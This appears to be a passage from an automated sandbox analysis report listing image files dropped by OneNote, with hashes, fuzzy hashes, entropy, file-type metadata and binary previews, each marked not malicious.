                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):59832
                                                                                                        Entropy (8bit):7.308211468398169
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                        MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                        SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                        SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                        SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11043
                                                                                                        Entropy (8bit):7.96811228801767
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                        MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                        SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                        SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                        SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10056
                                                                                                        Entropy (8bit):7.956064700093514
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                        MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                        SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                        SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                        SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):347
                                                                                                        Entropy (8bit):6.85024426015615
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                        MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                        SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                        SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                        SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2268
                                                                                                        Entropy (8bit):7.384274251000273
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                        MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                        SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                        SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                        SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):47294
                                                                                                        Entropy (8bit):7.497888607667405
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                        MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                        SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                        SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                        SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13737
                                                                                                        Entropy (8bit):7.916899917415529
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                        MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                        SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                        SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                        SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52945
                                                                                                        Entropy (8bit):7.6490972666456765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                        MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                        SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                        SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                        SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
